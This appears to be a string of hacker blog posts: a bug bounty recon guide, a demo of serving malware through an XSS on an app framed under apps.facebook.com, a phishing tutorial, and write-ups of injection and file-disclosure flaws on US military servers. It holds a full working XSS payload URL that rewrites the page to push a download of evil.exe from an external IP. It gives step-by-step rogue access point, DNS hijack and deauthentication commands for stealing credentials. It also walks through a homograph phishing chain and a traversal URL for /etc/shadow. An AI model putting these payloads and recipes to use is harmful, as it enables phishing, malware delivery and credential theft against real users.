A beginners guide to bug bounties

This blog post will be focusing on how to improve the overall quality of your reports, where to look for bugs in companies that have a bug bounty programme, and the steps to take regarding responsible disclosure of bugs that are eligible for bounty.

This is not a guide on how to find bugs in a technical sense, but rather a case of tactics you can use to find bugs that aren’t already previously reported by someone else – in this post I will be assuming you already have pentesting knowledge and are capable of finding your own bugs, therefore I will not be explaining how to test for vulnerabilities, but rather where to test for them and how to structure the reports once bugs have been identified. This is mainly just a general overview of how someone would map out a target site and efficiently perform reconnaissance to gain as much info on the site as possible before actually beginning their audit.

Other than recon, I won’t be getting into any stuff about methods for actually finding specific vulns themselves, although in the near future I plan on releasing a bunch of tutorials based around identifying and exploiting different kinds of web-based vulns.

What you need to remember about bug bounty programmes is that there is a lot of competition. This isn’t the same as a regular audit for a conventional client, as when performing an audit for a client you’re competing only against the security of the site you’re auditing – when you’re taking part in a bug bounty programme, you’re competing against both the security of the site running the program, and also competing against hundreds or thousands of other people who are taking part in the programme. For this reason, it’s important to think outside the box (as most researchers who have their reports constantly marked as dupes will know). This is why passive and active reconnaissance is especially important for bounty programmes, as you need to look a lot deeper than you would in a regular pentest (to avoid dupes or stuff that’s out of scope)

 

Which programme to choose:

I’m probably stating the obvious here, but some bug bounty programmes are way easier than others – Ideally you’re going to be wanting to choose a programme that has a wide scope. For example, I see lots of people having success with Yahoo’s bug bounty programme because the entire *.yahoo.com domain is within scope rather than the bounty being limited only to specific subdomains. You’re also ideally going to be wanting to look for a bounty programme that has a wider range of vulnerabilities within scope (for example, many BBP’s would consider stuff such as Open Redirects or Logout CSRF out of scope, whereas other bounties may accept these as valid submissions and even give payouts for more minor stuff i.e. enabled directory listings or missing security headers in HTTP) – the wider attack surface for the bounty programme, and the wider range of vulnerabilities considered valid, then the higher the chance would be of getting a valid payout. Companies that have a large amount of acquisitions within scope are also a good choice (more on this later).

You should also be aware of restrictions with bug bounty programme’s (for example the ability/inability to pay out based on which country you’re in – many bounty programmes will refuse to pay out to people living in certain countries)

Sites like HackerOne and Bugcrowd are a good starting point for deciding which bounty programme you want to partake in (also you’ll probably find yourself getting invites to private bounties after you’ve made a few valid submissions) – xssposed.org is also a unique concept in the sense that anyone can potentially reward you for your work, it doesn’t necessarily have to even be the admin of the site and the site doesn’t necessarily even have to have a bug bounty programme (the admin could see your report, then choose an acceptable reward at their own discretion). Ideally what you’ll want to be working towards is access to private bounties (via bugcrowd after reputation is gained, or via sites such as synack.com) as if the bounty is private, the chances of your submissions being marked as dupes are greatly diminished. There are also sites that have bounty programmes but don’t openly advertise this (vmware.com being one example that comes to mind).

After choosing which bounty programme you’re going to attempt, the next logical step would be to map out your attack surface.

 

Mapping out an attack surface:

First off, ensure that you have properly read the terms for the bounty and clearly understand which domains are in scope and which forms of vulnerabilities are considered valid reports – one of the worst things you can do is submit things that aren’t within scope of the bounty programme, this tells the people running the programme that you haven’t properly read the terms, and it will lead to them not taking your future reports seriously.

To efficiently begin testing for a bounty programme, you’re going to first have to perform as much passive/active recon as possible in order to effectively map out the site and give yourself an idea of how everything is structured

The larger the potential attack surface, the higher the chance of finding a bug. Assuming all subdomains are within scope, then one of the first steps would be to enumerate valid subdomains (using recon-ng or an online subdomain scanner), the scanner which I will be using is found here https://pentest-tools.com/information-gathering/find-subdomains-of-domain – if you’re using this then be sure to select the ‘include subdomain details’ option because that will allow you to get an idea of how their network is mapped out (In addition to giving you the subdomains that you can begin to start testing on)

Here is an example output of the online subdomain scanner listed above:

Screenshot_2016-03-22_13-45-19

Some companies will have entire IP address ranges dedicated to them, for example by looking at the output above, one could assume (not necessarily fact, just an assumption) that the 77.238.184.* range is owned by Yahoo, therefore one could start performing port scans on that range (which brings me to my next pont)

After mapping out the valid subdomains you’re going to want to perform port scans on each of the individual IP addresses associated with said domains, the most efficient way to do this is via nmap from the command line, a simple command will generally suffice:

nmap -T4 -A -v calendar.yahoo.com

use the -Pn flag if the host is blocking your ping probes

Screenshot_2016-03-22_13-52-03

It would be best to set something up to automate this, but ideally you want to be scanning each individual IP address associated with their subdomains and having the output saved to a file, after this look for any services running on unusual ports or any service running on default ports which could be vulnerable (i.e. FTPd, SSHd, etc). You’re also going to want to probe for the version info on services running in order to determine whether anything is outdated and potentially vulnerable.

Another thing that should be taken into consideration when doing these scans is that reverse proxies such as cloudflare or similar services may active, in which case it would be necessary to resolve the backend IP addresses (this can actually lead to some nice findings, as companies will assume that since their backend IP isn’t public therefore they won’t worry so much about locking down all of the services (i.e. only ports 80 and 443 opened), determining the backend IP and then scanning could definitely yield some interesting results (i.e. vuln/oudated services running on an open port)

For a site with a large attack surface, you’re really going to be wanting to make notes of everything during the reconnaissance stage to avoid confusion. Take them in whatever manner you want, but since participation in bug bounty programmes involves mainly blackbox testing, it is really important to get a feel of how the site is structured and to map it all out in order to be able to efficiently find bugs.

I’m sure any bug hunters reading this are more than capable of scanning for open ports/services and subdomains, I’m just reiterating it to stress its importance when trying to map out an attack surface on a large site. When looking for bounties, any low-hanging fruits you find are almost undoubtedly duplicates (that being said, they’re still worth reporting just incase), therefore its a good idea to have the network mapped out and to look into any obscure services running on unusual ports.

In addition to this, it’s a good thing to see which security measures are in place before actually carrying out your pentest. By this I mean checking the headers to see which security options are in place, for example looking for presence of X-XSS-Protection: 1; mode=block or X-Frame-Options: deny – knowing what security measures are in place means you know your limitations, which is very helpful when trying to find something eligible for a bounty payout (allows you to be more time-efficient etc). It should also be noted that some bounty programmes even give you a payout for letting them know that certain security headers are missing, so if you see headers missing then that is worth looking into (although for most bounty programmes this will not be eligible).

Checking what security measures are in place also means determining the presence of a WAF, an effective way to do this would be to use WafW00f which can be found here – this will allow you automatically perform fingerprinting to determine whether they have a WAF in place, and if so, what kind of WAF it is (assuming its a commercial WAF).

You’re also going to want to take note of the directory listings and use something like dirbuster to map out the possible contents of those directories assuming they are HTTP 403’d (use robots.txt to determine the directories which may contain useful info, look for the disallow rules).

Once this is done, you should have some notes somewhere with the name of each subdomain, and the following information:

  • Backend IP address
  • Open Ports / Services running
  • Service version info (if applicable)
  • server banners
  • directory listings
  • presence (or lack of) security headers
  • presence (or lack of) WAF (+ WAF type)

After this, you’re going to want to build upon these notes with more information (you can either do this all at the start, or you can test each subdomain one at a time and add the info then). You’re going to need to take note of all forms of accepted user inputs (GET/POST/COOKIES) so that you can probe these to check whether your inputs are properly escaped when it comes to actually testing for the vulnerabilities – to automate this just use burp suite or something similar (as long as it doesn’t violate the terms of the bounty, more on this later)

In addition to this, since you’re primarily going to be blackbox testing, it’s a good idea to use OSINT to your advantage to build upon the notes. You need to gain as much information as possible about the backend technologies used by the target site.

First off, Google is your friend – I see a lot of people referring to those who use Google dorks as ‘skids’ or whatever, but if you’re using TARGETED dorks then Google is an invaluable tool for when it comes to pentesting.

For example, lets say that the site you’re testing for the bug bounty programme has all domains in scope, except for their ‘development’ subdomain and their content delivery network – You want to perform more recon to see what kind of technologies that they are running on the domains that are in scope, you could do something like so:

site:example.com filetype:php -development.example.com -cdn.example.com

while changing the filetype: value as appropriate to see which technologies are actually running on the site (this is also very useful during the stage of actually finding vulns, i.e. by adding inurl:search to then test all search boxes for XSS)

Another good way of determining which kind of technologies are used on the site is by looking for employment positions available – you can look for tech-related positions that are available in the company and generally it will tell you what skills are required (naming specific programming languages and frameworks that are presumably in use), here is a current employment position available with Yahoo that i’m going to use as an example:

Screenshot_2016-03-22_19-15-06

From this job advertisement, you can tell that node.js is being used, hadoop server clusters are in use, etc etc. All of this information is purely passive recon available through OSINT. Obviously nothing serious, this one is just for example purposes but i’ve literally seen job advertisements for corporations in the past disclosing the exact MySQL version.

Make sure to spend as much time as possible performing recon, until you have a pretty good feel of how the site operates – there are even occasions where passive recon can lead to having the ability to whitebox, i.e. searching github or pastebin for the company name and stumbling across some random source that ended up online after some sloppy dev wrote it.

It’s also good to use OSINT to harvest emails/usernames associated with the target company, because you could put it together as part of a PoC for something related to auth bypass or bruteforcing (some bounty programmes accept ‘the ability to bruteforce’ as a valid submission – don’t ever try to bruteforce their live systems though)

Another important point is to check if any acquisitions are within scope of the bug bounty, because these are often written in a different manner (since a different dev team would have wrote a bunch of the code before it actually became an acquisition of the company in question) – this means they can be less secure in many instances, and while the payouts are generally lower for acquisitions, the vulns will be easier to identify and there’s also the bonus of still getting HoF. Just check for any recent acquisitions then use the steps detailed above to map it out like you did with the subdomains.

 

Finding the bugs:

In this section I will explain a few practises that should be followed when looking for bugs in a bug bounty programme (not an explanation of how to find them, but rather an explanation of what to do when finding them)

You’re going to be wanting to go through each section of the notes gathered while performing the recon, and checking off each domain one at a time as you test it for vulnerabilities (also don’t think the likes of XSS and SQLi will suffice, you need to be testing for all manner of vulns, even the uncommon ones – obviously it depends on the context in which you are testing and the technologies which you are testing against)

Avoid scanners. Port scanning, subdomain scanning or any form of scanning related to basic recon is fine. Using commercial vulnerability scanners such as Acunetix isn’t fine. I mean it should be obvious that the company themselves will probably routinely scan their own systems for vulnerabilities which they can patch pre-emptively, but if that isn’t obvious and you decide to use a scanner anyway, you’re going to be dealing with the issue of countless false-positives, any submission you do find is guaranteed to be a duplicate almost, and in addition to that there are many companies that will disqualify you from their programme if they have reason to believe you’re using a vuln scanner (which will be obvious to them in the headers, scanners are noisy). In most cases something like burp suite for mapping all user inputs will be fine and won’t breach any terms of the bounty.

In order to narrow down the kind of vulnerabilities you’re going to be looking for, it’s always a good idea to read up on past reports relating to the company where people have had payouts, look at what bypass methods they’ve used (if any) and just gain an understanding of how exactly they exploited the vuln – if you get lucky maybe the same dev working for the company has made the same mistakes in different scripts on different pages and maybe it hasn’t been patched there. Another good reason for reading up on past reports relating to the company is that you can then look at the patch that was implemented to fix the issue, and see if there are any ways to bypass the patch and recreate the issue in order to get your payout.

Also, it’s best not to just instantly report a vulnerability the moment you find it, as there is a chance that you could possibly pivot into something more serious. For example if you were to find an LFI and reported it as just LFI, you’d get a lower payout than finding the LFI, figuring out how it could be turned into RCE and then making the report. The same thing applies with other vulns such as XXE and SSRF, it’s best to do some testing to see how far you can take the vulnerability before making the report (in order to ensure the max payout) – by this I mean see what the potential of the vulnerability is, not exploit the vulnerability and compromise the server (this will get you disqualified for sure)

You also need to remember to do your testing in a responsible manner (to avoid breaching bounty terms) – For example if you thought you’d found a potential RCE, in order to verify it you should use some harmless command like whoami then check the output to see whether the command was successfully executed (as opposed to doing something like rm -rf /). Also when making your reports there’s no need to disclose potentially sensitive information (even if via private communications to the company), for example it would make a lot more sense to display the output of /etc/hosts as proof of file inclusion as opposed to the output of /etc/shadow.

Another point to remember is that if you see a vulnerability being blocked by a WAF, don’t assume it can’t be exploited – if you manage to bypass the WAF and get a working PoC to exploit the vulnerability then you’ll still get a payout (and probably also a payout or some swag from the WAF company too). Don’t think they’ll just be like “oh yeah that WAF wasn’t coded by us so we’re not paying you” because regardless of whether the WAF is present, the issue remains in the vulnerable code to begin with. The WAF is just an extra layer of protection.

 

Making the report:

If you find something that is valid, you really need to make your report stand out (but don’t overdo it), you want to explain the risk to the fullest extent, and you want to do so in a clear and concise manner.

Don’t just paste the links to the vulnerability and give an explanation of its risks, but instead show them the risks. For example if you were to find an XSS Vulnerable page then show first the URL alterting document.domain as opposed to a typical PoC of alert(0) to first show them exactly which domain is vulnerable (and to verify that it isn’t sandboxed), then maybe send a second URL below this with a crafted fake login page and explain to them it’s a demonstration of the potential phishing risk posed by the vulnerability.

Some companies appreciate video PoC’s, others (google is an example) tell you to keep your PoC as short as possible if you do make one and suggest that you just explain it via text instead. If you think a video PoC will better convey your report than words will, then go for it. It will probably tell you their personal preferences in their terms, but certain companies would much prefer a video PoC and they would assume it to be a more professional report.

One thing that almost all companies will want to read in a submission is numbered, step-by-step instructions on how exactly to reproduce the vulnerability, this needs to be clear to read and easy to follow.

Also, be thoughtful of the email address you use to make your PoC, it’s best to use your real name instead of your leet hacker handle (lol) – they’ll take your report way more seriously. It should also be noted that if you’ve made previous reports to the company that have been valid, then it’s best to contact them via the same email address if more vulnerabilities are found, most companies running bounties will definitely prioritize the reporters so that those who have consistently made valid reports will be seen to first (this is also especially applicable with crowdsourced bug-bounty sites such as hackerone and bugcrowd)

Ensure that your report isn’t too short or too long, and that spelling and grammar is accurate and it gets to the point, describing in exact detail the severity of the vulnerability and the steps to reproduce.

When you’re waiting on hearing the outcome of your report, make sure not to disclose the vulnerability to anyone and definitely not to post it online anywhere, you’ll instantly lose any chance of receiving a payout. Even if the vulnerability you disclose is out of scope, and you had other valid submissions which were in scope that you didn’t disclose, there’s still the risk of losing the entire payout due to violation of bounty terms.

 

Final Words:

Bug reporting can be hard. It can be time consuming, and while you can assume time = money, sometimes you can work for months on a submission only to find out it’s a duplicate of something that’s been previously reported. Other times you can make thousands of dollars for 10 minutes work.

Expect to be disappointed often, sometimes you will put in a lot of hard work only to end up with nothing. Other times you will get the easy cash payouts that you’ve been waiting for. You can also expect to hear the word ‘duplicate’. A lot. That being said, it’s a good learning curve, it can be fun, and you can make a lot of money if you get good at it.

If you come from a blackhat background, or even have a background as a pentester who does audits for companies, then you’re going to find bug bounties harder than what you were previously doing. The main reasons for this are due to the limited scope. In order to perform a successful attack against a normal target, you could use a variety of methods (targeting employees, targeting the DNS provider, etc), the limited scope of the bounty programme will prevent you from being able to do this, you will have to look for a vulnerability that is within scope on a domain that is also within scope. That being said, it’s way more rewarding (at least while staying on the right side of the law).

I’ll be doing a series of posts soon which will go in-depth into the actual techniques used while testing for vulns, rather than just the recon aspect of it.

Good luck and happy hunting

-M.

Using Facebook domain to serve malware

This will be a short post detailing how the Facebook domain can be used to serve malware and spear phish unsuspecting users.

I guess this is common knowledge to anyone who has looked into Facebook’s VRP, but the apps.facebook.com domain is used for embedding third-party content (i.e. websites that aren’t Facebook) onto a page with the facebook banner on it. Although this is not within scope of their VRP it is still a security risk – despite the fact that the vulnerabilities would be within external websites rather than Facebook, the outcome of vulnerabilities (think XSS / HTML Injection) would be displayed under the facebook.com domain and under the Facebook banner that the regular user has grown accustomed to. When naive internet users read up on how to prevent their accounts being stolen, they are warned of phishing attacks and told to always check the URL to make sure it’s spelled correctly – when such a user sees the correctly spelled URL, they’ll assume that its completely legitimate and accept it as a trusted source.

You may be wondering why Facebook doesn’t just disallow this content to be embedded under their apps domain, and the answer to that is simple – it would have a detrimental effect on the functionality of the site itself. Most people in infosec are undoubtedly already familiar with this concept, but for those who aren’t, here is a simple diagram that explains it:

21ceb9f

“Why is it represented as a triangle? If you start in the middle and move to the point toward Security, you’re moving further away from Functionality and Usability. Move the point toward Usability, and you’re moving away from Security and Functionality. Simply put, as security increases, the system’s functionality and ease of use decrease”

Basically, Facebook are probably already aware of the potential risk here, but have had to decide whether the risk outweighs the functionality of this feature, and they have probably decided that it does not (although i’m sure many people will disagree)

In order for an attacker to use this to their advantage, they would first have to identify a cross site scripting vulnerability in a site that has its content embedded under the apps domain of Facebook. Using some basic google dorks would be the most efficient way to do this, something like:

site:apps.facebook.com filetype:php inurl:search

After that, it’d be a case of finding a suitable vulnerable site that has its content embedded under this domain. For the purposes of this explanation, I will be using the following site:

https://apps.rezonux.com/caricature/view.php

Note how the site is accessible under the Facebook domain (with the Facebook banner conveniently added):

https://apps.facebook.com/caricatura/view.php

An attacker could easily craft a malicious URL that looks like it’s part of Facebook, when in reality it is exploiting a vulnerability on a third party website in order to serve malicious content to an unsuspecting user.

Although someone could in theory create their own page embedded under this domain (through legitimate means, i.e. their own Facebook app), serving malicious content in this manner isn’t exactly viable as the Facebook staff would catch on and delete this app – looking for vulnerabilities in currently existing apps then making a one-time link that will serve the malicious content is a more viable option, since there is no malicious page for the Facebook admins to see (unless reported to them w/ screenshots of the URL).

Below is an example page designed to demonstrate how the Facebook domain could be used to serve malware (note that in a real attack time would be spend to make both the content on the page and the URL itself more convincing – this is just for demonstration purposes):

https://apps.facebook.com/caricatura/view.php?friend=501337&effect=&x=&y=%22/%3E%3Cimg+src=x%20onerror=%22document.body.innerHTML=%27%3Ccenter%3E%3Cfont%20face=Arial%20color=black%20size=75%3EDownload%20the%20new%20Facebook%20desktop%20app%20here%20%28beta%20version%29:%3Cbr%3E%3Cbr%3E%3Ca%20href=http://45.55.162.179/evil.exe%3EDownload%20Now%3C/a%3E%3C/font%3E%3Cfont%20size=20%20color=black%3E%3Cbr%3E%3Ch6%3EIf%20you%20have%20trouble%20downloading,%20please%20hold%20down%20the%20CTRL%20key%20when%20clicking%20the%20link%3Cbr%3E%3Cbr%3EPlease%20submit%20any%20feedback%20%3Ca%20href=http://lol.com%3Ehere%3C/a%3E%3C/h6%3E%20%3C/font%3E%27;document.body.style.background=%27white%27%22%3E

Take note that this will only be working in Firefox, Chrome’s XSS auditor will definitely catch this

Screenshot:

Screenshot_2016-03-22_00-21-46

You should also note that in this example, the download link isn’t actually a malicious file (but rather an empty file with the .exe extension – once again for demonstration purposes)

In this case, Facebook have definitely chose functionality over security, and the trade-off they have made makes targeted phishing campaigns against Facebook users stupidly easy.

Below is a video PoC, demonstrating how the attack would play out:

 

That’s all for now, thanks for reading

– M

 

 

 

An intro to advanced phishing techniques

First off, sorry for the delay with writing this – been distracted with lots of IRL stuff and it took me over a month to actually get around to posting this (even though it was pretty much written a month ago). I’ll be updating this blog a lot more regularly from here onwards.

My last three posts have been the results of my findings testing against sites in the wild, this post will differ in the sense that it is more of a short tutorial.

NOTE: this is supposed to be a basic tutorial for beginners who may not already know of these methods, so apologies if you were expecting to learn something new.

In my previous post I demonstrated the steps required to setup a spear phishing attack using WebHTTrack – in this post I am going to discuss some of the more obscure and sophisticated methods of phishing which are less well known to those new to the infosec community.

I won’t bother going into methods such as spear phishing or typosquatting too much, and the main methods that I will be covering are bitsquatting, LAN-based phishing  and IDN Homograph attacks.

 

Bitsquatting:

While methods such as typosquatting rely upon human error (for example a user hitting the wrong key while entering their URL of choice), bitsquatting instead relies upon machine error.

To fully understand the concept of bitsquatting, you must first understand the concept of bit errors – when bits are transmitted across a data stream, there is a slim chance that the content of the devices memory can be altered (by a single bit), the factors that cause this to happen can vary, but they include interference, bit synchronization errors, faults within memory modules, distortions, etc.

Let me use an example to demonstrate this:

take the following domain example.com

here is the binary representation of example.com:

01100101 00100000 01111000 00100000 01100001 00100000 01101101 00100000 01110000 00100000 01101100 00100000 01100101 00100000 00101110 00100000 01100011 00100000 01101111 00100000 01101101

lets assume that a bit error takes place, and the last bit of the 9th byte is flipped:

01100101 00100000 01111000 00100000 01100001 00100000 01101101 00100000 01110001 00100000 01101100 00100000 01100101 00100000 00101110 00100000 01100011 00100000 01101111 00100000 01101101

while the user entered example.com into their address bar on their browser, the bit error taking place would instead cause examqle.com to be loaded, through no fault of the user.

While bit errors are uncommon, you should bear in mind that there are several stages while loading a web site in which there is a risk of bit errors (your OS when performs DNS resolution, your browser when it parses HTML, makes the initial HTTP request, etc)

In order to be successful at exploiting this, an attacker would have to bear in mind that the chances of bit errors taking place are relatively slim, therefore the attack would have to be performed on domain names that recieve a lot of traffic or are frequently resolved – the best choice of domain would be something like an ad server or a content delivery network for a large site (also root nameservers ftw??) – another factor to bear in mind is that the success of the bitsquatting attack is largely dependent on where the bit errors are taking place – for example, a bit error taking place in something like a popular proxy server or DNS resolver would affect a much larger number of people than a bit error taking place locally on a single person’s machine.

although bitsquatting isn’t a commonly used attack vector, domains that are frequently resolved are at the most risk – it should also be noted that many government sites (including US Court systems for almost every state!) use publicly available TLD’s (rather than .gov) which puts them at risk to this kind of attack (due to the fact that .us is publicly available) – these sites could contain potentially sensitive info (I see some of them having forms in which users can be prompted to enter their social security numbers, among other things) and this risk could be easily mitigated by switching to .tld’s which aren’t publicly avaialable. Here are some example’s of government sites that are registered under public TLD’s:

(google dork):

site:us inurl:state

It should also be noted that this threat can potentially be mitigated by utilizing some of the new gTLD’s when choosing a domain name – another point to make is that obviously it doesn’t have to be only alphanumeric characters that are susceptible to bitsquatting, take the following domain for example:

http://state.co.us

At first one might assume they were limited if they wanted to perform a bitsquatting attack on this site, due to the fact that co.us is already registered therefore it’d be impossible to make a subdomain that took advantage of bit errors in order to launch an attack, but this is not the case, someone could register statenco.us and take advantage of bit errors which cause the binary representation of n to be flipped, which would result in it being replaced with . (dot) meaning the domain would be resolved to state.co.us as intended.

 

IDN Homograph attacks:

This is a fairly interesting attack vector which takes advantage of similar looking characters in ASCII/Unicode domain names

For example, a domain name such as google.com could have the o’s in the domain made up of either the greek letter Ο, the latin letter O or the cyrillic letter О – as you can see, these all look practically identical to eachother, yet they have entirely different unicode representations.

Here is a live example using paypal (it should be noted that paypal and its users have been the successful victims of an IDN homograph attack in the recent past):

http://www.paypal.com

the domain above will take you to paypal.com, whereas the domain below will fail to resolve (due to the fact that it is not actually paypal.com)

http://www.pаypal.com

If you were to copy the link URL of the above domain, you would see that it is actually http://www.xn--pypal-4ve.com/ while at first glance it appears to look like paypal.com

The main defence against IDN Homograph attacks is punycode – this is what you see when you hover over a URL, and it will display the domain name in its true form, to see what i’m referring to just hover your mouse over both of the ‘paypal’ URL’s above and look at the bottom corner of your browsers to see their representation in punycode.

The vast majority of modern browsers have IDNA support disabled by default, meaning that when the URL is actually loaded the user will see the phony URL in their address bar – in order to make the attack more convincing, an attacker could setup a redirect so that xn--pypal-4ve.com redirects to a more authentic looking domain (at least at first glance), some examples would be as follows:

and so on…

If the site being targeted has an open redirect vulnerability, then it could be chained together with the fraudulent domain so that when the link is hovered over, a more legitimate looking domain is displayed via the punycode.

These methods chained together with some more conventional methods can make for a pretty effective phishing campaign. Here is an example attack scenario:

  • Attacker obtains a list of victims
  • Attacker finds and utilizes an open redirect in the site targeted within the phishing campaign
  • Attacker registers a domain that allows an IDN homograph attack to take place
  • Attacker sets up DNS redirect to have the domain redirected to a domain that looks similar to the site targeted in the phishing campaign
  • Attacker then chains the open redirect with the link to the site used for the IDN homograph attack
  • Attacker crafts spoofed emails containing the link and sends mass mail to the list of victims
  • Victim opens the email, assumes its from the target site (due to the email address being valid + the URL actually being part of the site (w/ punycode bypassed due to the fact a redirect is being used)
  • Victim is redirected from the site used for the IDN homograph attack to a phishing page registered on a domain that looks similar to the target site
  • Victim logs in
  • Attacker steals credentials

 

LAN-Based Phishing:

This is similar to spear phishing, but rather than requiring an XSS vulnerability in the site you want to phish, it instead requires that you have access to the victim’s LAN (which would either entail you cracking their WEP/WPA2 or using some method to remotely gain access i.e. via a remote access tool) – the fact that this requires LAN access means that entering their data to a phishing site is probably the least of the victims worries. That being said, it’s probably still worth covering.

Although I used httrack in the last posts to get a mirror of the site, the most simple way to phish over LAN would be to use SEToolkit (aka SET) – to use SET, install it via whatever your distro requires (apt-get/yum/pacman etc..), then cd to the directory for the install and type ./set to run it. Have a play around with the ‘clone site’ feature.

There are many issues with the method above, and you can perform a way more effective DNS-based phishing campaign (i.e. one that doesn’t display local IP’s in the browser) with some basic tools. In this example I will explain how to achieve it using aircrack-ng and MSF’S (metasploit’s) ‘fakeDNS’ aux module.

First off, you’d need to connect to the LAN in question (whether its a public hotspot or whether its someone’s home connection and you’re in close proximity to their house), after this you’re going to need to set your wireless card to monitor (promiscuous) mode, to do this you can use the tool airmon-ng (found within the aircrack-ng suite)

run the following command to create a new monitor interface:

Airmon-ng start wlan0

to start monitoring on the interface, airodump-ng should be used, run the following command to begin monitoring:

Airodunp-ng mon0

after this, you will need to find a hotspot with clients connected to it, the plan is to create a rogue access point that mimics this hotspot, to get the clients to connect to you instead of the hotspot itself, but first, you need to configure your DHCP server like so:

cd /etc/dhcp3

cat dhcpd.conf

In the config file, you’re going to be looking for the following option:

option domain-name-servers 1.1.1.1;

Open nano/vim/whatever the fuck you want, then change this line so that the IP address is replaced with your own IP (or at least the IP you’re going to be running the FakeDNS module off of)

to create the rogue access point, we’re first going to be using airbase-ng to make a soft access point using the following command:

airbase-ng -e freenet mon0

next you’re going to want to install the FakeDNS aux module for metasploit and ensure that the options are correct (simply google for a correct setup, there’s a bunch of documentation) and then ensure its running and assign an IP to the tap interface for the soft access point created via airbase-ng, to do so you’ll need to use the following commands:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

After this, the final step is to deauth-flood the victim which will cause them to disconnect from the legitimate access point and be reconnected to your rogue access point, aireplay-ng can be used to achieve this via the following command:

aireplay-ng –deauth 100 -a MAC:FOR:ACCESS:POINT mon0 -c MAC:FOR:CLIENT:VICTIM

after running this command, you should be able to check airbase-ng output to see the victim connecting to your rogue access point (identifiable via MAC address)

once the victim tries to navigate to the site you’re using w/ FakeDNS, they will be redirected to your phishing page and their credentials are logged. And that’s all there is to it.

My next blog post (besides maybe a few little tutorials coming first) will be covering a critical zero-day vulnerability that I have identified, with over 40,000 affected sites including UK Ministry of Defence, US Navy, NASA, Namecheap, ICANN, Time Warner Cable, Toshiba, FedEx and more🙂

thanks for reading

– M.

 

 

 

 

Military audits are necessary

This blog post will be covering some of my findings in the military sector, and also their lack of response. I am only posting this now because they’ve finally patched just a few days ago. these vulnerabilities have been present for months. I’ve tried to contact them several times but it’s been no use whatsoever.

I’ll start with the two major ones and then just follow up with some XSS, first off is the US Department of Defense (specifically the Defense Contract Management Agency)

Here is a definition of the DCMA, taken from Google:

The Defense Contract Management Agency (DCMA) is the agency of the United States federal government responsible for performing contract administration services for the Department of Defense and other authorized federal agencies. Its headquarters is at Fort Lee, VA.DCMA often handles Foreign Military Sales contracts.

The vulnerability in question is an SQL Injection but present via a slightly less common technology, there was a GET-based SQL injection present in a flawed java servlet, located in http://pubapp.dmca.mil/ – here is the message that you are greeted with while accessing that URL:

qt_Dwg9e

text:

Welcome to DCMA
You are accessing a U.S. Government (USG) Information System (IS) that is provided for USG-authorized use only.
By using this IS (which includes any device attached to this IS), you consent to the following conditions:
  • The USG routinely intercepts and monitors communications on this IS for purposes including, but not limited to, penetration testing, COMSEC monitoring, network operations and defense, personnel misconduct (PM), law enforcement (LE), and counterintelligence (CI) investigations.
  • At any time, the USG may inspect and seize data stored on this IS.
  • Communications using, or data stored on, this IS are not private, are subject to routine monitoring, interception, and search, and may be disclosed or used for any USG authorized purpose.
  • This IS includes security measures (e.g., authentication and access controls) to protect USG interests—not for your personal benefit or privacy.
  • Notwithstanding the above, using this IS does not constitute consent to PM, LE or CI investigative searching or monitoring of the content of privileged communications, or work product, related to personal representation or services by attorneys, or clergy, and their assistants. Such communications and work product are private and confidential. See User Agreement for details.

So, communications are routinely intercepted and monitored, yet it remains vulnerable to SQL injection for several months?

I had a media contact reach out to the Department of Defense to act as a middle-man of sorts, and when I showed the vulnerable link to the DoD they responded with something along the lines of “How do we get past the login wall, what are the steps to reproduce?” The ‘login wall’ that they were referring to was literally just a warning about invalid SSL certs:

Screenshot_2015-12-02_23-04-47

URL: 

https://pubapp.dcma.mil/CASD/setup_CasdPaymentOfficeReport.do?Seqid=36%27

as you can see in the screenshot above, it is just a warning and was a case of simply clicking ‘proceed’ to get around this. The URL for the SQL injection can be seen above and the vulnerable parameter was ?SeqId=

In many cases, this wouldn’t be such a big deal (im not saying people should be lax about web security here) as long as there was no way of an attacker getting shell access or anything similar, and as long as no sensitive data is stored on the server so nothing of a private or sensitive nature can be exfiltrated. Of course to know exactly what kind of data we are dealing with, access would have to illegally be gained or the data illegally stolen, which I’m not going to do for obvious reasons – that being said, you can gain a pretty good idea of what you’re dealing with if the table names are outputted and this is the case here, the output of those table names makes me believe this could potentially be a serious issue in the sense that it appears the personal information of Department of Defense employees could possibly be exposed.

Below is the output that was recieved once ‘ or %27 equivalent is injected into the parameter:

Error Message: JBO-27122: SQL error during statement preparation. Statement: SELECT * FROM (SELECT PAYMENT_OFFICE_ID, NAME, DODAAC, TELEPHONE_NUMBER, PHONE_COMMENT, FAX, FAX_COMMENT, DSN, DSN_COMMENT, EMAIL, COMMRI_PRIMARY, COMMRI_SECONDARY, COMMENTS, ADDRESS_LINE1, ADDRESS_LINE2, ADDRESS_LINE3, ADDRESS_LINE4, CITY, STATE_PROVINCE_CODE, ZIP_POSTAL_CODE, COUNTRY_CODE, (CITY || ‘, ‘ || nvl(STATE_PROVINCE_CODE, (select NM from COUNTRIES where CNTRY = COUNTRY_CODE))) LOCATION FROM CASD_PAYMENT_OFFICES) QRSLT WHERE (PAYMENT_OFFICE_ID = 36’) ORDER BY upper(NAME) ASC

Here is a live screenshot of the page output (taken from phone):

IkE46PLO.jpg

The fact that they make themselves so hard to contact, with no defined method – alongside the fact that they refer to a page warning about invalid SSL certs as a ‘login wall’ makes me really question their credibility – the guy who made the login wall comment is a supposed infosec contact at the Department of Defense and was notified of this vulnerability months ago – it was only patched in the past few days. What if some blackhats found this vulnerability and exploited it, and are now in possession of the personal information of a bunch of DoD employees? Judging from those warnings on the index page, I expected them to take their site security at least somewhat seriously.

As of writing this blog, attempting to access the vulnerable link throws a HTTP 500 error – which suggests to me that it has successfully been patched:

Screenshot_2016-01-13_17-51-40

It’s pretty crazy to think that a Department of Defense server would be vulnerable to something so obvious and simple to patch.

But the next finding is an even bigger fuck-up, LFD on a US Army server with probably some of the worst security i’ve ever seen – for some reason that is completely beyond me they have their HTTP Daemon running as a root user, and the vulnerable script having root privs also. Albeit this was just some subdomain but the fact something can be so insecure on a military server is baffling. Here is the path to the vulnerability in question (now also patched):

http://mesl.apgea.army.mil/mesl/account/EHFileDownload?fileString=../../etc/shadow

I noticed the ?fileString= param and tried ../../etc/shadow as input while in no way expecting this to ever actually work (I just wanted to see what kind of output I got to see how the script acts – if I had wanted to actually obtain a local system file then the passwd file would have been my first choice). As soon as I load the URL, it downloads the shadow file without even giving me a prompt first, I literally could not believe it, doubted that it would have ever worked.

This vulnerability was patched maybe a month or so after me reporting it (albeit no response from the Army) – at least this one was patched in a much quicker length of time than the DoD vuln.

